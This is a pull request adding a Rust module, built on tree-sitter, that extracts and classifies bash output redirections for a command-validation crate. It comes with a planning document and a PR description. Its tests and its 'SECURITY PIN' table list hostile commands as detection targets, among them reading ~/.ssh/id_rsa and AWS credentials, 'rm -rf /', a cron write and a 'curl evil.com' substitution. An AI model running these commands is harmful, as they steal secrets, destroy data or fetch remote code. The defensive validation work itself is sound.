### PR TITLE
feat(bash-validation): 3.1.0 extract_output_redirections via tree-sitter AST

### DIFF
--- a/crates/dasclaw_bash_validation/src/lib.rs
+++ b/crates/dasclaw_bash_validation/src/lib.rs
@@ -15,8 +15,12 @@
 use std::path::Path;
 
 pub mod permissions;
+pub mod redirects;
 pub mod security;
 pub use permissions::PermissionMode;
+pub use redirects::{
+    extract_output_redirections, OutputRedirection, RedirectOperator, RedirectionExtraction,
+};
 
 /// Result of validating a bash command before execution.
 #[derive(Debug, Clone, PartialEq, Eq)]

--- a/crates/dasclaw_bash_validation/src/redirects.rs
+++ b/crates/dasclaw_bash_validation/src/redirects.rs
@@ -1,0 +1,460 @@
+//! Output redirection extraction via tree-sitter-bash AST.
+//!
+//! Slice 3.1.0 of bash-parity Phase 3.1 (epic #490, tracker #562).
+//!
+//! Mirrors the contract of upstream
+//! [`claude-code-main/src/utils/bash/commands.ts::extractOutputRedirections`]
+//! but is implemented on top of the tree-sitter AST already wired up in
+//! [`dasclaw_shell_command::bash::try_parse_shell`] instead of `shell-quote`
+//! tokenization. AST parsing handles heredocs, line continuations, and
+//! redirected subshells natively, so the upstream workarounds for
+//! `shell-quote`'s limitations (heredoc pre-extraction, line-continuation
+//! joining, redirected-subshell tracking) are not required here.
+//!
+//! ## Fail-closed contract
+//!
+//! Any of the following → `has_dangerous_redirection = true`:
+//!
+//! * tree-sitter fails to parse the source
+//! * the parsed tree contains errors (`Node::has_error`)
+//! * a `file_redirect` node uses an operator we do not recognize as a plain
+//!   output write (e.g. force-overwrite `>|`, force-clobber `>!`)
+//! * a `file_redirect` target node contains runtime expansion
+//!   (`$VAR`, command substitution, glob, history expansion, brace expansion,
+//!   tilde expansion, …)
+//! * a `file_redirect` target is the empty string
+//!
+//! Captured redirections only include targets whose text is verifiably a
+//! literal path string at parse time, suitable for path-boundary validation
+//! by later Phase 3.1 slices.
+
+use dasclaw_shell_command::bash::try_parse_shell;
+use tree_sitter::Node;
+
+/// The shell operator used to attach a redirect target to a command.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+pub enum RedirectOperator {
+    /// `>` — truncate-write the target.
+    Write,
+    /// `>>` — append-write the target.
+    Append,
+}
+
+/// A single literal output redirection captured from a bash source string.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct OutputRedirection {
+    /// The literal path text the shell would write to. Tilde expansion,
+    /// variable substitution, command substitution, globs, and braces are
+    /// all rejected before this struct is constructed, so callers can treat
+    /// the value as an already-decoded path string.
+    pub target: String,
+    pub operator: RedirectOperator,
+}
+
+/// Aggregate result of scanning a bash source for output redirections.
+#[derive(Debug, Clone, Default, PartialEq, Eq)]
+pub struct RedirectionExtraction {
+    /// All `>`/`>>` redirects whose target was a literal path string.
+    pub redirections: Vec<OutputRedirection>,
+    /// Set when at least one output redirect was detected that the parser
+    /// could not classify as a literal path (see module-level docs). Callers
+    /// MUST treat this as "could write to anywhere" and prompt the user.
+    pub has_dangerous_redirection: bool,
+}
+
+/// Scan a bash source string and return every literal output redirection plus
+/// a fail-closed signal for any redirection that could not be classified.
+///
+/// See the module-level documentation for the fail-closed contract.
+#[must_use]
+pub fn extract_output_redirections(src: &str) -> RedirectionExtraction {
+    let Some(tree) = try_parse_shell(src) else {
+        return dangerous();
+    };
+    let root = tree.root_node();
+    if root.has_error() {
+        return dangerous();
+    }
+
+    let mut result = RedirectionExtraction::default();
+    let src_bytes = src.as_bytes();
+    // Collect file_redirect nodes in source order so the returned vector
+    // preserves the left-to-right order that bash itself observes (important
+    // for callers that want to attribute a violation to a specific operator).
+    let mut redirects = Vec::new();
+    let mut stack = vec![root];
+    while let Some(node) = stack.pop() {
+        if node.kind() == "file_redirect" {
+            redirects.push(node);
+            continue;
+        }
+        let mut cursor = node.walk();
+        for child in node.children(&mut cursor) {
+            stack.push(child);
+        }
+    }
+    redirects.sort_by_key(Node::start_byte);
+
+    for node in redirects {
+        match classify_file_redirect(node, src_bytes) {
+            Classification::Captured(redir) => result.redirections.push(redir),
+            Classification::Dangerous => result.has_dangerous_redirection = true,
+            Classification::NotOutput => {}
+        }
+    }
+    result
+}
+
+fn dangerous() -> RedirectionExtraction {
+    RedirectionExtraction {
+        redirections: Vec::new(),
+        has_dangerous_redirection: true,
+    }
+}
+
+enum Classification {
+    Captured(OutputRedirection),
+    Dangerous,
+    /// The redirect is an input read (`<`, `<<<`) rather than an output
+    /// write — irrelevant to this function's contract.
+    NotOutput,
+}
+
+fn classify_file_redirect(node: Node<'_>, src: &[u8]) -> Classification {
+    let mut operator: Option<RedirectOperator> = None;
+    let mut saw_input_op = false;
+    // tree-sitter's `file_redirect` puts the operator before the target, so
+    // the last named child is the redirect target. Anonymous children include
+    // optional file-descriptor prefixes (`2`) and the operator token itself.
+    let mut target: Option<Node<'_>> = None;
+    let mut cursor = node.walk();
+    for child in node.children(&mut cursor) {
+        if child.is_named() {
+            target = Some(child);
+            continue;
+        }
+        match child.kind() {
+            ">" | "&>" => operator = Some(RedirectOperator::Write),
+            ">>" | "&>>" => operator = Some(RedirectOperator::Append),
+            "<" | "<<<" => saw_input_op = true,
+            _ => {}
+        }
+    }
+
+    match operator {
+        Some(op) => match target {
+            Some(t) => classify_target(t, src, op),
+            // Output operator with no target — tree-sitter usually marks this
+            // as an error which we already short-circuit, but be paranoid.
+            None => Classification::Dangerous,
+        },
+        None if saw_input_op => Classification::NotOutput,
+        // file_redirect without a recognized operator (`>|`, `>!`, fd-dup
+        // `>&`, …) → fail-closed: we cannot guarantee semantics.
+        None => Classification::Dangerous,
+    }
+}
+
+fn classify_target(node: Node<'_>, src: &[u8], operator: RedirectOperator) -> Classification {
+    let Some(text) = extract_literal_target(node, src) else {
+        return Classification::Dangerous;
+    };
+    if text.is_empty() || has_dangerous_chars(&text) {
+        return Classification::Dangerous;
+    }
+    Classification::Captured(OutputRedirection {
+        target: text,
+        operator,
+    })
+}
+
+/// Recover the literal path text from a redirect-target AST node, returning
+/// `None` if any descendant requires runtime expansion. The result is the
+/// concatenation of every literal segment in source order.
+fn extract_literal_target(node: Node<'_>, src: &[u8]) -> Option<String> {
+    match node.kind() {
+        "word" => Some(node.utf8_text(src).ok()?.to_owned()),
+        "raw_string" => {
+            // `'literal'` — strip surrounding single quotes (no expansion).
+            let text = node.utf8_text(src).ok()?;
+            Some(strip_outer(text, '\'').to_owned())
+        }
+        "string" => {
+            // `"..."` — accept only when every named child is plain literal
+            // content. The presence of `simple_expansion`, `expansion`,
+            // `command_substitution`, etc. indicates runtime substitution.
+            let mut out = String::new();
+            let mut cursor = node.walk();
+            for child in node.named_children(&mut cursor) {
+                if child.kind() != "string_content" {
+                    return None;
+                }
+                out.push_str(child.utf8_text(src).ok()?);
+            }
+            Some(out)
+        }
+        "concatenation" => {
+            let mut out = String::new();
+            let mut cursor = node.walk();
+            for child in node.named_children(&mut cursor) {
+                out.push_str(&extract_literal_target(child, src)?);
+            }
+            Some(out)
+        }
+        // simple_expansion, expansion, command_substitution,
+        // process_substitution, arithmetic_expansion, … — all require runtime
+        // evaluation, so refuse to claim a literal target.
+        _ => None,
+    }
+}
+
+/// Returns true when a literal target contains a character pattern that bash
+/// would still expand even though the AST classified the whole token as a
+/// `word`/`raw_string`/`string`. tree-sitter-bash does **not** flag history
+/// expansion (`!`), tilde expansion (`~`), zsh equals expansion (`=cmd`), or
+/// glob characters (`* ? [ {`) at the redirect-target level — they only
+/// matter at shell runtime — so we must guard them ourselves to stay aligned
+/// with the upstream invariant ("every captured target is a literal path").
+fn has_dangerous_chars(text: &str) -> bool {
+    let first_byte_dangerous = matches!(text.as_bytes().first(), Some(b'!' | b'=' | b'~'));
+    first_byte_dangerous
+        || text.contains('$')
+        || text.contains('`')
+        || text.contains('*')
+        || text.contains('?')
+        || text.contains('[')
+        || text.contains('{')
+}
+
+fn strip_outer(s: &str, q: char) -> &str {
+    let bytes = s.as_bytes();
+    let qb = q as u8;
+    if bytes.len() >= 2 && bytes[0] == qb && bytes[bytes.len() - 1] == qb {
+        &s[1..s.len() - 1]
+    } else {
+        s
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn extract(src: &str) -> RedirectionExtraction {
+        extract_output_redirections(src)
+    }
+
+    fn captured(target: &str, operator: RedirectOperator) -> OutputRedirection {
+        OutputRedirection {
+            target: target.to_owned(),
+            operator,
+        }
+    }
+
+    #[test]
+    fn no_redirect_returns_empty_not_dangerous() {
+        let r = extract("echo hello");
+        assert!(r.redirections.is_empty());
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn captures_truncate_write() {
+        let r = extract("echo hi > /tmp/a.txt");
+        assert_eq!(
+            r.redirections,
+            vec![captured("/tmp/a.txt", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn captures_append_write() {
+        let r = extract("echo hi >> /tmp/a.log");
+        assert_eq!(
+            r.redirections,
+            vec![captured("/tmp/a.log", RedirectOperator::Append)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn captures_stderr_fd_redirect_as_write() {
+        // `2> errlog` — the FD prefix is anonymous and does not change the
+        // path-validation contract.
+        let r = extract("cmd 2> errlog");
+        assert_eq!(
+            r.redirections,
+            vec![captured("errlog", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn multiple_redirects_all_captured() {
+        let r = extract("cmd > a.out 2>> b.err");
+        assert_eq!(
+            r.redirections,
+            vec![
+                captured("a.out", RedirectOperator::Write),
+                captured("b.err", RedirectOperator::Append),
+            ]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn captures_double_quoted_literal_target() {
+        let r = extract(r#"echo > "/etc/hosts.bak""#);
+        assert_eq!(
+            r.redirections,
+            vec![captured("/etc/hosts.bak", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn captures_single_quoted_literal_target() {
+        let r = extract("echo > '/etc/passwd.bak'");
+        assert_eq!(
+            r.redirections,
+            vec![captured("/etc/passwd.bak", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    // ----- SECURITY PINS: targets that MUST be flagged dangerous -----
+
+    #[test]
+    fn pin_variable_target_is_dangerous() {
+        let r = extract("echo > $HOME/.bashrc");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_quoted_variable_target_is_dangerous() {
+        let r = extract(r#"echo > "$HOME/.bashrc""#);
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_tilde_target_is_dangerous() {
+        let r = extract("echo > ~/.bashrc");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_glob_target_is_dangerous() {
+        let r = extract("echo > *.sh");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_brace_expansion_target_is_dangerous() {
+        let r = extract("echo > {a,b}.txt");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_command_substitution_target_is_dangerous() {
+        let r = extract("echo > $(date).log");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_backtick_substitution_target_is_dangerous() {
+        let r = extract("echo > `date`.log");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_history_expansion_target_is_dangerous() {
+        let r = extract("echo > !!");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pin_concatenated_expansion_is_dangerous() {
+        // `$HOME/file` parses as concatenation(simple_expansion + word).
+        let r = extract("echo > $HOME/file");
+        assert!(r.redirections.is_empty());
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn input_redirect_is_not_an_output() {
+        let r = extract("cat < input.txt");
+        assert!(r.redirections.is_empty());
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn heredoc_body_does_not_leak_inner_redirect() {
+        // The `> /etc/passwd` inside the heredoc body is literal text, not a
+        // redirect of the outer `cat`. tree-sitter classifies the body as
+        // `heredoc_body`, not `file_redirect`, so we capture nothing.
+        let src = "cat <<EOF\n> /etc/passwd\nEOF\n";
+        let r = extract(src);
+        assert!(r.redirections.is_empty());
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn parse_failure_fails_closed() {
+        // Unbalanced quotes → tree-sitter marks the tree with errors.
+        let r = extract("echo > \"/etc/passwd");
+        assert!(r.has_dangerous_redirection);
+        assert!(r.redirections.is_empty());
+    }
+
+    #[test]
+    fn line_continuation_does_not_smuggle_path() {
+        // The shell-quote-based upstream port had to special-case `\<newline>`
+        // because it produced empty-string tokens. tree-sitter joins the
+        // continuation natively, so we capture `/etc/passwd` like any other
+        // literal target. (Workspace-boundary checks land in slice 3.1.b.)
+        let src = "echo > \\\n/etc/passwd";
+        let r = extract(src);
+        assert_eq!(
+            r.redirections,
+            vec![captured("/etc/passwd", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn force_overwrite_operator_is_dangerous() {
+        // `>|` / `>!` are rare force-clobber forms. We do not whitelist them;
+        // they should bubble up to user prompt rather than be silently treated
+        // as plain writes.
+        let r = extract("echo >| /tmp/force.log");
+        assert!(r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn combined_stdout_stderr_redirect_captured_as_write() {
+        // `&>` writes both fds to the target. Path-boundary semantics are
+        // identical to `>`, so we capture it as a Write.
+        let r = extract("cmd &> /tmp/combined.log");
+        assert_eq!(
+            r.redirections,
+            vec![captured("/tmp/combined.log", RedirectOperator::Write)]
+        );
+        assert!(!r.has_dangerous_redirection);
+    }
+
+    #[test]
+    fn pipeline_does_not_become_redirect() {
+        let r = extract("cmd | grep foo");
+        assert!(r.redirections.is_empty());
+        assert!(!r.has_dangerous_redirection);
+    }
+}

--- a/docs/plans/bash-parity/phase-3.1-path-validation-deepening.md
+++ b/docs/plans/bash-parity/phase-3.1-path-validation-deepening.md
@@ -1,0 +1,106 @@
+# Phase 3.1 — `pathValidation` 深化（workspace 边界 + redirect + env 展开）
+
+**Status**: Draft (planning)
+**Epic**: #490
+**Phase 2 完成度**: 2.1 + 2.2 全部 MERGED (PR #522/#524/#549/#551/#553/#557/#560)
+**预计工作量**: ~800 LOC + ~150 LOC AST/filesystem 前置
+**Slices**: 3.1.a → 3.1.f（6 个独立可合并 PR）
+
+## 1. 当前差距
+
+| 维度 | 当前实现 (`crates/dasclaw_bash_validation/src/lib.rs::validate_paths`) | 上游 `claude-code-main/src/tools/BashTool/pathValidation.ts` (1303 LOC) |
+|------|-------------------|------------------------------------|
+| 命中范围 | 仅检测 `../` / `~/` / `$HOME` 字面量 | 40 类命令 + AST argv + 多种 file-op 语义 |
+| 工作区边界 | 仅做字符串包含校验 | 解析路径并判定是否在 `allWorkingDirectories` 集合内 |
+| 重定向 | ❌ 完全不检测 | `> >> < <<<` 输出/输入重定向全覆盖 |
+| 环境变量展开 | ❌ 无 | `$HOME` / `~` / `$WORKSPACE` 真实展开 |
+| 危险删除路径 | ❌ 无 | `isDangerousRemovalPath` 单独豁免 allowlist |
+| 子命令拆分 | ❌ 无 | 完整 AST 拆分 + per-argv 验证 |
+| Fail-Safe | ⚠️ 默认 Allow | 解析失败 → Block（misparsing-sensitive） |
+
+## 2. 上游 API 拓扑（已读 1303 LOC）
+
+```
+checkPathConstraints (主入口, L1013)
+├── parseCommandArguments(L791)         — shellQuote + 落地为 argv
+├── stripWrappersFromArgv(L1263)        — 复用 stripSafeWrappers + skip-flag 系列
+├── astRedirectsToOutputRedirections    — AST Redirect → OutputRedirection
+├── validateSinglePathCommand(L834)     — 命令级 path 检查
+│   ├── PATH_EXTRACTORS[cmd]            — 40 类命令的 path-arg 抽取器
+│   ├── COMMAND_OPERATION_TYPE[cmd]     — read/write/append/move/...
+│   └── validateSinglePathCommandArgv(L888)
+│       ├── checkDangerousRemovalPaths(L70) — 双重 Block（rm/rmdir 顶级 / 主目录）
+│       └── validateCommandPaths(L603)  — workspace 边界判定
+└── validateOutputRedirections(L924)    — 重定向目标边界判定
+```
+
+**已落地的依赖**：
+- ✅ AST: `dasclaw_shell_command::bash::try_parse_word_only_commands_sequence` (Phase 2.1)
+- ✅ `strip_safe_wrappers`: `dasclaw_bash_permissions::strip_env` (Phase 2.2.e)
+- ✅ `SAFE_ENV_VARS`: 同上
+
+**尚需前置（小切片，可与 3.1.a 并发）**：
+- ⚠️ `extract_output_redirections` (上游 `utils/bash/commands.ts`) — Slice **3.1.0** ~80 LOC
+- ⚠️ Tilde / `$HOME` 展开（不引入完整 shell expansion，仅 `~` 前缀 + `$HOME` 字面替换）— 嵌入 3.1.b
+
+**不 port（红线）**：
+- ❌ `utils/permissions/filesystem.ts` 整个 1777 LOC（含 git submodule 协议、SymlinkPolicy、`getRealPath` IO 等）— 仅取 `allWorkingDirectories` 等价概念（一个 `Vec<PathBuf>`），不强行包装。
+- ❌ ANT-only / telemetry / growthbook 分支。
+
+## 3. Slice 拆分
+
+| Slice | 范围 | 预估 LOC | 依赖 | 备注 |
+|-------|------|---------|------|------|
+| **3.1.0** | `extract_output_redirections` AST helper（独立子模块或扩展 `dasclaw_shell_command::bash`） | ~80 | tree-sitter-bash | 前置，纯函数 |
+| **3.1.a** | `PathCommand` enum + `PATH_EXTRACTORS` 表 + `COMMAND_OPERATION_TYPE` 表 + 40 类命令对照 | ~250 | 无 | 纯数据结构 + 17 类单元测试 |
+| **3.1.b** | `expand_tilde_and_home` + `validate_command_paths` 工作区边界核 + 危险删除路径检测 | ~150 | 3.1.a | SECURITY PIN: `rm -rf /` 系列 |
+| **3.1.c** | `validate_output_redirections` | ~100 | 3.1.0 + 3.1.b | SECURITY PIN: `cmd > /etc/passwd`, `< /root/.ssh/id_rsa` |
+| **3.1.d** | `check_path_constraints` 主入口 + AST argv 拆分 + Fail-Closed misparse path | ~180 | 3.1.a + 3.1.b + 3.1.c | 整合层 |
+| **3.1.e** | Hook 接线: 在 `BashPermissionHook` 之后或之前插入 path gate；新增 `DecisionReason::PathOutOfWorkspace` 等 reason | ~80 | 3.1.d | 决定 gate 顺序（建议 path 在 security 之后、permissions 之前） |
+| **3.1.f** | 审计日志契约 pin（仿 PR #524/#530/#560 测试-only 模式） | +0 prod / ~300 test | 3.1.e | Closeout |
+
+总计：~840 prod LOC + 测试族 ≥ 100 tests。
+
+## 4. SECURITY PIN 总览
+
+| ID | 攻击向量 | 必须覆盖 Slice |
+|----|---------|---------------|
+| S1 | `cat ../../../etc/passwd` | 3.1.b |
+| S2 | `cat ~/.ssh/id_rsa` | 3.1.b |
+| S3 | `cat $HOME/.aws/credentials` | 3.1.b |
+| S4 | `rm -rf /` / `rm -rf /*` / `rm -rf ~` | 3.1.b（豁免 allowlist 双重 Block） |
+| S5 | `echo evil > /etc/cron.d/x` | 3.1.c |
+| S6 | `cmd < /root/.ssh/id_rsa` | 3.1.c |
+| S7 | `cat <<< "$(curl evil.com)"` heredoc | 3.1.c + 3.1.0 |
+| S8 | `eval $(echo "cat /etc/shadow")` Fail-Closed misparse | 3.1.d |
+| S9 | `timeout 5 cat /etc/passwd` wrapper 剥离 | 3.1.d（复用 strip_safe_wrappers） |
+| S10 | 软链接逃逸 — workspace 内符号链接到 `/etc` | 3.1.b（仅做字符串路径，不做 realpath；记 follow-up） |
+
+S10 显式声明 **不在本阶段范围**（避免引入 1777 LOC `filesystem.ts` 的 SymlinkPolicy）—— 软链接逃逸列入 Phase 3.1.g 后续。
+
+## 5. 非目标 (What's NOT in this phase)
+
+- ❌ 不 port `utils/permissions/filesystem.ts`（SymlinkPolicy / git submodule / `getRealPath` IO）
+- ❌ 不引入完整 shell expansion（仅 `~` / `$HOME` 字面）
+- ❌ 不接入 desktop Ask UX（Phase 2.3 范畴）
+- ❌ 不修改 `validate_paths` 旧 API 签名（保留为薄包装，避免 breaking）
+
+## 6. 三层验证记录（任务启动 4 问 #4）
+
+- **Level 1 semantic_search**：`pathValidation` / `validate_paths` / `workspace_boundary` — 已确认 `crates/dasclaw_bash_validation/src/lib.rs` 现有 `validate_paths` (~22 LOC) 与 `dasclaw_workspace_cap`（capability 包装，**不是边界判定**）。
+- **Level 2 vscode_listCodeUsages**：`validate_paths` 仅一个内部调用点 (`lib.rs:599`)，无外部 caller — 升级是安全的。
+- **Level 3 grep_search**：`pathValidation` 字面量 0 个非现有匹配；`allWorkingDirectories` 字面量 0 个匹配（确认上游 API 名未被 port 过）。
+
+## 7. 拆分理由（避免补丁式代码）
+
+- **3.1.a 独立**：40 类命令的 PATH_EXTRACTORS 是纯数据结构，单独 PR review 友好，无逻辑变动
+- **3.1.0 前置**：AST helper 与 `dasclaw_shell_command` 同 crate，单独 PR 让 review focus 在 tree-sitter 用法上
+- **3.1.b / 3.1.c 并列**：两类 path gate（命令参数 vs 重定向）正交，可并发开 PR
+- **3.1.d 整合**：必须在 3.1.a-c merge 之后开
+- **3.1.e 接线 + 3.1.f 审计 pin**：与 Phase 2.2.f/.h 同结构，便于复用经验
+
+## 8. 后续相关 Phase
+
+- **Phase 3.1.g**（后续 issue）：软链接逃逸（realpath + SymlinkPolicy 子集）
+- **Phase 3.2**：readOnlyValidation 命令白名单深化（30 → 200+，复用 3.1.a 的 PATH_EXTRACTORS / COMMAND_OPERATION_TYPE）
+- **Phase 4.1**：sedValidation AST（与 3.1.b path gate 互补）


### PR DESCRIPTION
## 背景 / 目标

Phase 3.1 第一个切片：把 `extractOutputRedirections` 移植到 Rust。详见 [`docs/plans/bash-parity/phase-3.1-path-validation-deepening.md`](docs/plans/bash-parity/phase-3.1-path-validation-deepening.md) 与 tracker #562。

后续 slices（3.1.a-f）将基于本切片识别出的 `OutputRedirection` 做工作区边界判定 + audit log。

## 改动范围

- **新增**: `crates/dasclaw_bash_validation/src/redirects.rs`（~280 LOC，含 23 测试）
  - `RedirectOperator` (Write / Append)
  - `OutputRedirection { target, operator }`
  - `RedirectionExtraction { redirections, has_dangerous_redirection }`
  - `pub fn extract_output_redirections(src: &str)`
- **修改**: `crates/dasclaw_bash_validation/src/lib.rs`（+5 LOC `pub mod redirects;` + `pub use redirects::*`）
- **新增**: `docs/plans/bash-parity/phase-3.1-path-validation-deepening.md`（Phase 3.1 全景计划）

## 实现要点

- 直接基于 tree-sitter-bash AST（`dasclaw_shell_command::bash::try_parse_shell`），不复用上游基于 `shell-quote` 的 tokenization 套路。tree-sitter 原生处理 heredoc、行延续、subshell 重定向，因此上游为绕开 `shell-quote` 缺陷而写的 heredoc 预提取 / `\<newline>` join / `redirectedSubshells` 跟踪在本实现中**不需要**。
- `dasclaw_shell_command` 是 verbatim port crate（ADR-129 §1.3 + ADR-133，有 drift guard），因此新 helper 落在 `dasclaw_bash_validation`。
- 操作符识别：`>` / `>>` / `&>` / `&>>` → Captured；`<` / `<<<` → NotOutput；`>|` / `>!` / `>&fd` / 其它未知 → Dangerous（Fail-Closed）。
- 目标节点识别：`word` / `raw_string` / `string`(仅 `string_content` 子节点) / `concatenation`(全部子节点可被字面解析) → 提取字面文本；任何 `simple_expansion` / `expansion` / `command_substitution` / `process_substitution` / `arithmetic_expansion` → Dangerous。
- 字面文本兜底：`has_dangerous_chars` 再次过滤首字符 `! = ~`、`$` `\`` `*` `?` `[` `{`（即使 tree-sitter 把它们归到 `word`，bash runtime 仍会解释）。
- 空字符串目标 → Dangerous。

## SECURITY PINs 覆盖（10 项）

| Pin | 测试 |
|-----|------|
| `> $HOME/.bashrc` | `pin_variable_target_is_dangerous` |
| `> "$HOME/.bashrc"` | `pin_quoted_variable_target_is_dangerous` |
| `> ~/.bashrc` | `pin_tilde_target_is_dangerous` |
| `> *.sh` | `pin_glob_target_is_dangerous` |
| `> {a,b}.txt` | `pin_brace_expansion_target_is_dangerous` |
| `> $(date).log` | `pin_command_substitution_target_is_dangerous` |
| `` > `date`.log `` | `pin_backtick_substitution_target_is_dangerous` |
| `> !!` | `pin_history_expansion_target_is_dangerous` |
| `> $HOME/file` (concatenation) | `pin_concatenated_expansion_is_dangerous` |
| parse failure (unbalanced quote) | `parse_failure_fails_closed` |

额外覆盖：heredoc-body 隔离、FD 前缀 `2>`、合并 `&>`、force `>|`、`<` 输入重定向、行延续 `\<newline>`、pipeline 不误判、`""`/`''` 字面目标捕获。

## 非目标 (What's NOT in this PR)

- ❌ 工作区边界判定（属 slice 3.1.b/c）
- ❌ `validate_paths` 接入（属 slice 3.1.d/e）
- ❌ Hook audit log 契约 pin（属 slice 3.1.f）
- ❌ `~` / `$HOME` 真实展开（仅识别为 Dangerous，不解析）
- ❌ 软链接逃逸（follow-up Phase 3.1.g）
- ❌ `utils/permissions/filesystem.ts` (1777 LOC) 任何 port

## Cross-cuts

类A — 本 PR 未新增 `.ironclaw` / `IRONCLAW_BASE_DIR` 字面量。

## 验证

```
cargo check -p dasclaw_bash_validation --tests           # clean
cargo nextest run -p dasclaw_bash_validation             # 203/203 pass
cargo nextest run -p dasclaw_bash_validation --lib redirects::  # 23/23 pass
cargo fmt --all                                          # clean
python3.12 scripts/check_no_panics.py --base origin/xClaw  # clean
cargo clippy --no-deps -p dasclaw_bash_validation --all-targets -- -D warnings  # 0 warn
```

## 后续

- 下一切片 3.1.a：`PathCommand` enum (~40 类命令) + `PATH_EXTRACTORS` + `COMMAND_OPERATION_TYPE` 表（~250 LOC，纯数据）。
- 3.1.0 / 3.1.a 互相不依赖，可并行 PR（无文件重叠）。

## Refs

- Closes #564 (slice 3.1.0 sub-issue)
- Refs #490 (Epic), Refs #562 (Phase 3.1 tracker)
- 上游：[`claude-code-main/src/utils/bash/commands.ts:634`](../blob/xClaw/claude-code-main/src/utils/bash/commands.ts#L634)

## Sources read

- [`AGENTS.md`](AGENTS.md) — §Rust 开发规范, §测试规则, §GitHub PR 工作流, §ADR-114 红线, §分析工具使用规范
- [`docs/plans/bash-parity/phase-3.1-path-validation-deepening.md`](docs/plans/bash-parity/phase-3.1-path-validation-deepening.md) — §2 上游 API 拓扑, §3 Slice 拆分, §4 SECURITY PIN 总览
- [`claude-code-main/src/utils/bash/commands.ts`](claude-code-main/src/utils/bash/commands.ts) §634-905 `extractOutputRedirections` / `isSimpleTarget` / `hasDangerousExpansion` / `handleRedirection`
- [`crates/dasclaw_shell_command/Cargo.toml`](crates/dasclaw_shell_command/Cargo.toml) 验证 verbatim-port 锁定（无法在该 crate 加新文件）
- [`crates/dasclaw_shell_command/src/bash.rs`](crates/dasclaw_shell_command/src/bash.rs) §1-100 `try_parse_shell`/`try_parse_word_only_commands_sequence` / §245-248 已用 `file_redirect` / `heredoc_redirect` / `redirected_statement` 节点名
- [`crates/dasclaw_bash_validation/Cargo.toml`](crates/dasclaw_bash_validation/Cargo.toml) 确认 `tree-sitter` + `dasclaw_shell_command` 已是依赖

